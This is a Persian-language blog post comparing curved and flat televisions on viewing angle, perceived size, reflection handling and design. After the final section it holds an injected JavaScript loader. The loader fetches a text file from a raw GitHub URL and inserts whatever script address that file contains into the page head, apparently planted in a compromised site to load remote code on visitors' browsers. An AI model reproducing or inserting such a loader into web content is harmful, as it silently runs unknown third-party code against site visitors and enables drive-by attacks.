دسته‌بندی نشده

مقایسه تلویزیون های منحنی و تخت

در سال 2021 تقریبا از تلویزیون های منحنی دیگر خبری نیست. در سال 2010 تعدادی زیادی از تلویزیون های منحنی مخصوصا از برند سامسونگ در دسترس بود اما امروزه تنها تعداد انگشت شماری از این مدل ها در بازار موجود می باشند. این محصول برای ایجاد قابلیت های دیداری و نمایش بهتر تصاویر ارائه شدند اما متاسفانه در برخی از مدل های تلویزیون منحنی زاویه دید مناسبی وجود ندارد و کیفیت ان فقط در نزدیکی تلویزیون خوب و مناسب است. در این مطلب در مورد تفاوت بین تلویزیون های خمیده با مدل های تخت و ویژگی و قابلیت های مثبت و منفی ان توضیح خواهیم داد.

زاویه دید

هر دو نوع تلویزیون تخت و منحنی مزایا و معایب خود را از نظر زاویه دید دارند. در هر حال نوع نمایشگر تلویزیون بیشتر از انحنا ان بر روی زاویه دید تاثیر دارد، بنابراین اگر هر دو تلویزیون از یک نوع پنل برخوردار باشند، برخلاف تفاوت شکل ظاهری زاویه دید مشابه یکدیگر خواهند داشت. برای مثال در تلویزیون های TU8300 و TU8000 به دلیل استفاده از پنل VA زاویه دید محدود را ارائه می دهند بنابراین در قسمت های حاشیه ای کیفیت تصاویر پایین می اید و شاهد افت ان خواهیم بود. بهرحال در تلویزیون های تخت کیفیت در هر دو قسمت چپ و راست مانند و مشابه یکدیگر عمل می کند و اگر در قسمت چپ کیفیت پایین اید در قسمت راست نیز به همین صورت عمل می کند، اما تلویزیون های منحنی اینگونه عمل نمی کنند و تصاویری که در قسمت چپ مشاهده می کنید نسبت به قسمت راست متفاوت است، در زاویه دید گسترده نیز تصاویر سمت راست تلویزیون به سختی مشاهده خواهد شد. نمایشگر های منحنی بسیار سودمند خواهند بود اگر کاربران نزدیک ان بنشینند، مخصوصا اگر به عنوان مانیتور استفاده شوند. برعکس در تلویزیون های تخت با زاویه دید محدود زاویه های سمت راست و چپ در صورت نزدیک شدن کاربر به تلویزیون تاریک تر می شوند و تصاویر کیفیت خود را از دست خواهند داد. 

برنده: نمایشگر تخت

اندازه و سایز ها

یکی از نکته هایی که هنگام ارائه تلویزیون های منحنی بیان می شود بزرگ تر دیده شده ان ها نسبت به اندازه خود می باشد، برای مثال یک تلویزیون 55 اینچ خمیده در نمایش تصاویر بزرگ تر از تلویزیون های 55 اینچ معمولی عمل می کند، این ویژگی ممکن است درست باشد اما به دلیل زاویه دید محدود ان تنها برای قسمت مرکزی تلویزیون صدق می کند. برای مثال تلویزیون های UN55MU8000 و UN55MU8500 زاویه دید مشابه یکدیگر را ارائه می دهند و از کیفیت تصویر نزدیک به یکدیگر برخوردار می باشند، اما با محاسبه ان ها با یکدیگر مشاهده می شود که تلویزیون منحنی MU8500 تفاوت بسیار جزئی با نمایشگر تخت دارد و مانند یک تلویزیون 55.8 اینچ عمل می کند، البته هر چه به نلویزیون نزدیک تر شوید نمایشگر ان بزرگ تر جلوه می کند به همین دلیل است که مانیتور های منحنی هنوز طرفداران بسیار زیادی دارند.

برنده: نمایشگر منحنی

کنترل بازتاب

به سبب ظاهر این دو نمایشگر، نمایشگر های منحنی و تخت عملکرد متفاوتی در بازتاب نور دارند. نور در تلویزیون های منحنی در سراسر نمایشگر پخش می شود و فضای بیشتری را اشغال می کند، اما در نمایشگر های تخت به دلیل انعکاس مستقیم ان به عقب نور در تمام صفحه پخش نمی شود. برخی از افراد ممکن رفلکس تلویزیون های منحنی را ترجیح دهند اما نظر کلی در مورد ان وجود ندارد و انتخاب یکی از ان ها به سلیقه شخصی کاربران بستگی دارد. 

برنده: هر دو

طراحی و ضخامت

اولین و مهمترین دلیل خرید تلویزیون های منحنی شکل ظاهری ان ها می باشد. قسمت پشتی این تلویزیون ها اندازه بزرگ تر و حجیم تری دارند اما از نظر شکل و ظاهر بسیار زیبا می باشند، علارغم تفاوت در طراحی می‌ توان این تلویزیون ها را نیز به دیوار وصل کرد و از ظاهر زیبا ان لذت برد. تلویزیون های تخت باریک تر هستند و قسمت پشتی ان ها نیز کم حجم تر ساخته می شود بنابراین اگر به دنبال یک تلویزیون کاملا باریک هستند مدل های تخت برایتان کاربردی تر می باشد. 

برنده: هر دو (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *